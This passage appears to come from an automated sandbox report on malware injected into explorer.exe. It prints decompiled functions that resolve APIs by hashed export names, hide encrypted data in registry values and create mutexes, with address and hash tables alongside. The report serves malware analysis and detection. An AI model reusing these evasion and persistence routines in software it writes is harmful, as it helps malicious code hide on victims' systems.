                  0x0008bf1a
                  0x0008bef7
                  0x0008bf24
                  0x0008bf2e
                  0x0008bf2e
                  0x00000000

                  APIs
                  • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,0040FC08,00000000,?,00000002), ref: 0008BEBE
                  • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BEE1
                  • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BF0E
                  • RegCloseKey.KERNEL32(?,?,00000002), ref: 0008BF2E
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: QueryValue$CloseOpen
                  • String ID:
                  • API String ID: 1586453840-0
                  • Opcode ID: 7a4cdaf7386973441e4760f86288c6c940ee8b5e5eb7e5f1cc676981f8255861
                  • Instruction ID: a503bc69bf056dc60d578d60e72969ac8cbe77b2aa393cc8f9a4dd6054926014
                  • Opcode Fuzzy Hash: 7a4cdaf7386973441e4760f86288c6c940ee8b5e5eb7e5f1cc676981f8255861
                  • Instruction Fuzzy Hash: 0921A4B5A00148BF9B61DFA9DC44DAEBBF8FF98740B1141A9B945E7211D7309E00DB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 521 8dfad-8dfc4 522 8e021 521->522 523 8dfc6-8dfee 521->523 524 8e023-8e027 522->524 523->522 525 8dff0-8e013 call 8c379 call 8d400 523->525 530 8e028-8e03f 525->530 531 8e015-8e01f 525->531 532 8e041-8e049 530->532 533 8e095-8e097 530->533 531->522 531->525 532->533 534 8e04b 532->534 533->524 535 8e04d-8e053 534->535 536 8e063-8e074 535->536 537 8e055-8e057 535->537 539 8e079-8e085 LoadLibraryA 536->539 540 8e076-8e077 536->540 537->536 538 8e059-8e061 537->538 538->535 538->536 539->522 541 8e087-8e091 GetProcAddress 539->541 540->539 541->522 542 8e093 541->542 542->524
                  C-Code - Quality: 100%
                  			E0008DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0008D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                  0x0008dfb6
                  0x0008dfb8
                  0x0008dfbb
                  0x0008dfbe
                  0x0008dfc4
                  0x0008e021
                  0x00000000
                  0x0008e021
                  0x0008dfc6
                  0x0008dfd1
                  0x0008dfd4
                  0x0008dfd9
                  0x0008dfde
                  0x0008dfe1
                  0x0008dfe3
                  0x0008dfe6
                  0x0008dfe9
                  0x0008dfee
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008dff0
                  0x0008dff0
                  0x0008e002
                  0x0008e00f
                  0x0008e013
                  0x00000000
                  0x00000000
                  0x0008e015
                  0x0008e018
                  0x0008e019
                  0x0008e01f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008e01f
                  0x0008e036
                  0x0008e03b
                  0x0008e03f
                  0x00000000
                  0x0008e04b
                  0x0008e04b
                  0x0008e04d
                  0x0008e04d
                  0x0008e053
                  0x00000000
                  0x00000000
                  0x0008e059
                  0x0008e05d
                  0x0008e061
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008e061
                  0x0008e067
                  0x0008e06f
                  0x0008e074
                  0x0008e077
                  0x0008e077
                  0x0008e079
                  0x0008e07d
                  0x0008e085
                  0x00000000
                  0x00000000
                  0x0008e089
                  0x0008e091
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008e091

                  APIs
                  • LoadLibraryA.KERNEL32(.dll), ref: 0008E07D
                  • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E089
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: .dll
                  • API String ID: 2574300362-2738580789
                  • Opcode ID: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                  • Instruction ID: 961bbec8ee8d513a9e7f355b8d92f0886381f3dfd6057b13809224bdd72c88db
                  • Opcode Fuzzy Hash: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                  • Instruction Fuzzy Hash: 6F310631A001458BCB25EFADC884BAEBBF5BF44304F280869D981D7352DB70EC81CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00089B43, Relevance: 4.8, APIs: 3, Instructions: 254COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 543 89b43-89b75 call 88604 546 89b7e-89b9e call 8b5f6 543->546 547 89b77-89b79 543->547 551 89ba0 546->551 552 89ba3-89bb8 call 895c7 546->552 548 89e1a-89e1e 547->548 551->552 555 89cee-89cfb 552->555 556 89bbe-89bd6 552->556 557 89d3c-89d4c call 89292 555->557 558 89cfd-89d1e 555->558 563 89ceb 556->563 564 89bdc-89bf8 556->564 567 89d4f-89d51 557->567 565 89d20-89d3a call 89292 558->565 566 89d54-89d74 call 885c2 RegOpenKeyExA 558->566 563->555 564->566 573 89bfe-89c18 call 89292 564->573 565->567 574 89dc8-89dcd 566->574 575 89d76-89d8b RegCreateKeyA 566->575 567->566 580 89d8d-89db2 call 8861a memset call 8861a 573->580 582 89c1e-89c36 573->582 577 89dcf 574->577 578 89dd5 574->578 579 89dba-89dbf 575->579 575->580 577->578 585 89dd8-89df4 call 8c379 578->585 583 89dc1 579->583 584 89dc3-89dc6 579->584 580->579 592 89c38-89c7c call 895e1 call 892e5 call 885d5 call 89256 582->592 593 89cab-89cb0 582->593 583->584 584->585 599 89e0b-89e18 call 8861a 585->599 600 89df6-89e09 585->600 615 89c8b-89ca9 call 8861a * 2 592->615 616 89c7e-89c83 592->616 598 89cb6-89ce9 call 89292 call 8861a 593->598 598->566 599->548 600->599 600->600 615->598 616->615 618 89c85 616->618 618->615
                  C-Code - Quality: 89%
                  			E00089B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				void* _t91;
				char* _t92;
				long _t96;
				int* _t97;
				intOrPtr _t98;
				int* _t101;
				long _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E00088604(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E0008B5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E000895C7(0x4d2);
					_t163 = _v24;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E00089292(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0x9e68c; // 0x40fab8
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t92 = E00089292(_v24);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0x9e688; // 0xb0000
						_t128 =  *0x9e68c; // 0x40fab8
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0x9e68c; // 0x40fab8
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E000885C2( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								_t98 =  *0x9e68c; // 0x40fab8
								 *((intOrPtr*)(_t98 + 0x1c))();
								_t155[0x43] = _v8;
								_t101 = E0008C379(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E0008861A( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E0008861A( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E0008861A( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E00089292(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0x9e68c; // 0x40fab8
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0x9e68c; // 0x40fab8
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E000895E1( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E000892E5(_v32);
							_v32 = _t179;
							E000885D5( &_v24);
							_t183 = _t181 + 0x18;
							_t147 = E00089256(_v12);
							_v24 = _t147;
							_t148 =  *0x9e68c; // 0x40fab8
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E0008861A( &_v32, 0xfffffffe);
							E0008861A( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E00089292(_v12);
						_t171 =  *0x9e684; // 0x40f8f0
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E0008861A( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}



















































                  0x00089b4c
                  0x00089b4e
                  0x00089b51
                  0x00089b53
                  0x00089b5b
                  0x00089b5e
                  0x00089b65
                  0x00089b6d
                  0x00089b6f
                  0x00089b75
                  0x00089b7e
                  0x00089b86
                  0x00089b8c
                  0x00089b93
                  0x00089b99
                  0x00089b9b
                  0x00089b9e
                  0x00089ba0
                  0x00089ba0
                  0x00089ba0
                  0x00089ba8
                  0x00089bab
                  0x00089bb0
                  0x00089bb3
                  0x00089bb6
                  0x00089bb8
                  0x00089cee
                  0x00089cee
                  0x00089cf4
                  0x00089cfb
                  0x00089d3c
                  0x00089d40
                  0x00089d41
                  0x00089d47
                  0x00089d4c
                  0x00089d4f
                  0x00089d4f
                  0x00089d51
                  0x00000000
                  0x00089d51
                  0x00089d00
                  0x00089d0a
                  0x00089d13
                  0x00089d18
                  0x00089d1b
                  0x00089d1e
                  0x00000000
                  0x00000000
                  0x00089d20
                  0x00089d24
                  0x00089d25
                  0x00089d2a
                  0x00089d2b
                  0x00089d2e
                  0x00089d32
                  0x00089d37
                  0x00000000
                  0x00089bbe
                  0x00089bbe
                  0x00089bcb
                  0x00089bd1
                  0x00089bd4
                  0x00089bd6
                  0x00089ceb
                  0x00000000
                  0x00089ceb
                  0x00089bdf
                  0x00089be3
                  0x00089beb
                  0x00089bf2
                  0x00089bf5
                  0x00089bf8
                  0x00089d54
                  0x00089d57
                  0x00089d6f
                  0x00089d72
                  0x00089d74
                  0x00089dc8
                  0x00089dcb
                  0x00089dcd
                  0x00089dcf
                  0x00089dcf
                  0x00089dd5
                  0x00089dd8
                  0x00089dd8
                  0x00089ddd
                  0x00089de4
                  0x00089dea
                  0x00089def
                  0x00089df2
                  0x00089df4
                  0x00089e0b
                  0x00089e11
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00089df6
                  0x00089df6
                  0x00089e02
                  0x00089e06
                  0x00089e07
                  0x00089e07
                  0x00000000
                  0x00089df6
                  0x00089d79
                  0x00089d86
                  0x00089d89
                  0x00089d8b
                  0x00089dba
                  0x00089dbd
                  0x00089dbf
                  0x00089dc1
                  0x00089dc1
                  0x00089dc3
                  0x00000000
                  0x00089dc3
                  0x00089d8d
                  0x00089d96
                  0x00089da2
                  0x00089dad
                  0x00000000
                  0x00089db2
                  0x00089bfe
                  0x00089bff
                  0x00089c02
                  0x00089c07
                  0x00089c0b
                  0x00089c10
                  0x00089c13
                  0x00089c16
                  0x00089c18
                  0x00000000
                  0x00000000
                  0x00089c29
                  0x00089c31
                  0x00089c34
                  0x00089c36
                  0x00089cab
                  0x00089cb3
                  0x00089c38
                  0x00089c3a
                  0x00089c49
                  0x00089c51
                  0x00089c57
                  0x00089c5a
                  0x00089c62
                  0x00089c65
                  0x00089c6f
                  0x00089c72
                  0x00089c77
                  0x00089c7a
                  0x00089c7c
                  0x00089c7e
                  0x00089c81
                  0x00089c83
                  0x00089c85
                  0x00089c85
                  0x00089c83
                  0x00089c91
                  0x00089c9c
                  0x00089ca1
                  0x00089ca4
                  0x00089ca4
                  0x00089cc3
                  0x00089cc8
                  0x00089cce
                  0x00089cd1
                  0x00089cd3
                  0x00089cd9
                  0x00089ce2
                  0x00000000
                  0x00089ce8
                  0x00089bb8
                  0x00089b77
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 7a5bdae8416784e85c0cb2d11311cc110e919660312a92c4e400b32489df4c49
                  • Instruction ID: 48420b51e388212ba148de9a5a5aa9c152fd141e90dbe33b6e7652c92ab7c875
                  • Opcode Fuzzy Hash: 7a5bdae8416784e85c0cb2d11311cc110e919660312a92c4e400b32489df4c49
                  • Instruction Fuzzy Hash: 139127B1900209AFDF10EFA9DD45DEEBBB8FF48310F144169F555AB262DB359A00CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A0AB, Relevance: 4.6, APIs: 3, Instructions: 146registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E0008A0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
				char* _v12;
				char _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				char* _v32;
				char _v52;
				char _v64;
				char _v328;
				char _v2832;
				signed int _t48;
				signed int _t49;
				char* _t54;
				long _t73;
				long _t80;
				long _t83;
				void* _t88;
				char* _t89;
				intOrPtr _t90;
				void* _t103;
				void* _t104;
				char* _t106;
				intOrPtr _t107;
				char _t108;

				_t48 = __ecx;
				_t89 = __edx;
				_v24 = __ecx;
				if(_a4 == 0 || _a8 == 0) {
					L13:
					_t49 = _t48 | 0xffffffff;
					__eflags = _t49;
					return _t49;
				} else {
					_t115 = __edx;
					if(__edx == 0) {
						goto L13;
					}
					_t107 =  *((intOrPtr*)(__ecx + 0x108));
					_push(_t107);
					_t103 = 4;
					_v12 = __edx;
					_v28 = E0008D400( &_v12, _t103);
					_t93 = _t107 + __edx;
					E00092301(_t107 + __edx,  &_v2832);
					_t54 = E0009242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
					_t108 = _a8;
					_v12 = _t54;
					_v20 = _t54 + 6 + _t108;
					_t106 = E00088604(_t54 + 6 + _t108);
					_v32 = _t106;
					if(_t106 != 0) {
						 *_t106 = _a12;
						_t16 =  &(_t106[6]); // 0x6
						_t106[1] = 1;
						_t106[2] = _t108;
						E000886E1(_t16, _a4, _t108);
						_t21 = _t108 + 6; // 0x6
						E000922D3( &_v2832, _t21 + _t106, _v12);
						_v16 = _t89;
						_t90 = _v24;
						_v12 =  *((intOrPtr*)(_t90 + 0x108));
						_push( &_v52);
						_t104 = 8;
						E0008F490( &_v16, _t104);
						E0008EAC1( &_v16,  &_v52, 0x14,  &_v328);
						E0008EB2E(_t106, _v20,  &_v328);
						_t73 = E00089B0E(_t90);
						_v12 = _t73;
						__eflags = _t73;
						if(_t73 != 0) {
							E000897A0(_v28,  &_v64, 0x10);
							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
							__eflags = _t80;
							if(_t80 == 0) {
								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
								__eflags = _t83;
								if(_t83 != 0) {
									_push(0xfffffffc);
									_pop(0);
								}
								RegCloseKey(_a4);
							} else {
								_push(0xfffffffd);
								_pop(0);
							}
							E0008861A( &_v12, 0xffffffff);
						}
						E0008861A( &_v32, 0);
						return 0;
					}
					_t88 = 0xfffffffe;
					return _t88;
				}
			}



























                  0x0008a0b8
                  0x0008a0bd
                  0x0008a0bf
                  0x0008a0c2
                  0x0008a231
                  0x0008a231
                  0x0008a231
                  0x00000000
                  0x0008a0d2
                  0x0008a0d2
                  0x0008a0d4
                  0x00000000
                  0x00000000
                  0x0008a0da
                  0x0008a0e3
                  0x0008a0e6
                  0x0008a0e7
                  0x0008a0ef
                  0x0008a0f2
                  0x0008a0fd
                  0x0008a10d
                  0x0008a112
                  0x0008a115
                  0x0008a11e
                  0x0008a126
                  0x0008a12b
                  0x0008a130
                  0x0008a13d
                  0x0008a13f
                  0x0008a146
                  0x0008a14b
                  0x0008a14e
                  0x0008a156
                  0x0008a163
                  0x0008a168
                  0x0008a16e
                  0x0008a177
                  0x0008a17d
                  0x0008a180
                  0x0008a181
                  0x0008a193
                  0x0008a1a3
                  0x0008a1af
                  0x0008a1b4
                  0x0008a1b7
                  0x0008a1b9
                  0x0008a1c3
                  0x0008a1de
                  0x0008a1e1
                  0x0008a1e3
                  0x0008a1fe
                  0x0008a201
                  0x0008a203
                  0x0008a205
                  0x0008a207
                  0x0008a207
                  0x0008a210
                  0x0008a1e5
                  0x0008a1e5
                  0x0008a1e7
                  0x0008a1e7
                  0x0008a219
                  0x0008a21f
                  0x0008a226
                  0x00000000
                  0x0008a22d
                  0x0008a134
                  0x00000000
                  0x0008a134

                  APIs
                    • Part of subcall function 0009242D: _ftol2_sse.MSVCRT ref: 0009248E
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 0008A1DE
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeapOpen_ftol2_sse
                  • String ID:
                  • API String ID: 3756893521-0
                  • Opcode ID: d54c1703fe1289286cc4c0b85853d477177f9829347cd8886942ae4bf892e17c
                  • Instruction ID: 678beb8ec0cb8c060cb6281312f41271aa2b36fb26bfbf1ebb42210e6552e48b
                  • Opcode Fuzzy Hash: d54c1703fe1289286cc4c0b85853d477177f9829347cd8886942ae4bf892e17c
                  • Instruction Fuzzy Hash: 7551B372A00209BBDF20EF94DC41FDEBBB8BF05320F108166F555A7291EB749644CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008B998, Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E0008B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E00088604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E0008861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                  0x0008b99b
                  0x0008b99c
                  0x0008b9a3
                  0x0008b9ab
                  0x0008b9af
                  0x0008b9b8
                  0x0008b9fe
                  0x0008b9fe
                  0x0008b9c5
                  0x0008b9cd
                  0x0008b9cf
                  0x0008b9d5
                  0x0008b9ee
                  0x00000000
                  0x0008b9f0
                  0x0008b9f5
                  0x00000000
                  0x0008b9fb
                  0x0008b9d7
                  0x0008b9d7
                  0x0008b9d7
                  0x0008b9d7
                  0x0008b9d5
                  0x0008ba04

                  APIs
                  • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9B3
                  • GetLastError.KERNEL32(?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9BA
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9E9
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: InformationToken$AllocateErrorHeapLast
                  • String ID:
                  • API String ID: 2499131667-0
                  • Opcode ID: 76e1adf5722fb6614a2b176c5bbd778ca9856826630c0b21538b3f5b23351a75
                  • Instruction ID: 50b00f07447128573cf446961854993498285b3da02e0cb9ad280b6d8ca9cbf5
                  • Opcode Fuzzy Hash: 76e1adf5722fb6614a2b176c5bbd778ca9856826630c0b21538b3f5b23351a75
                  • Instruction Fuzzy Hash: 62016272600118BF9B64ABAADC49DAB7FECFF457A17110666F685D3211EB34DD0087A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008590C, Relevance: 4.5, APIs: 3, Instructions: 44synchronizationCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E0008A4BF(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0x9e684; // 0x40f8f0
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}








                  0x00085910
                  0x00085915
                  0x00085921
                  0x0008592e
                  0x00085932
                  0x0008594a
                  0x0008596a
                  0x0008596b
                  0x0008595a
                  0x0008595a
                  0x00085960
                  0x00085960
                  0x00085934
                  0x00085934
                  0x0008593a
                  0x0008593a
                  0x00085917
                  0x00085917
                  0x00085917
                  0x00085973

                  APIs
                  • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085928
                  • GetLastError.KERNEL32(?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085934
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateErrorLastMutex
                  • String ID:
                  • API String ID: 1925916568-0
                  • Opcode ID: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                  • Instruction ID: 1c4491eb415752db81424c57f385e659120548c2048b1677d1101b25907139c6
                  • Opcode Fuzzy Hash: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                  • Instruction Fuzzy Hash: 3FF02831600910CBEA20276ADC4497E76D8FBE6772B510322F9E9D72D0DF748C0543A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A471, Relevance: 4.5, APIs: 3, Instructions: 30synchronizationCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008A471(CHAR* __ecx, void* __edx) {
				intOrPtr _t8;
				void* _t16;
				void* _t17;

				_t16 = __edx; // executed
				_t17 = CreateMutexA(0, 1, __ecx);
				if(_t17 != 0) {
					if(GetLastError() == 0xb7 && E0008A4BF(_t17, _t16) < 0) {
						_t8 =  *0x9e684; // 0x40f8f0
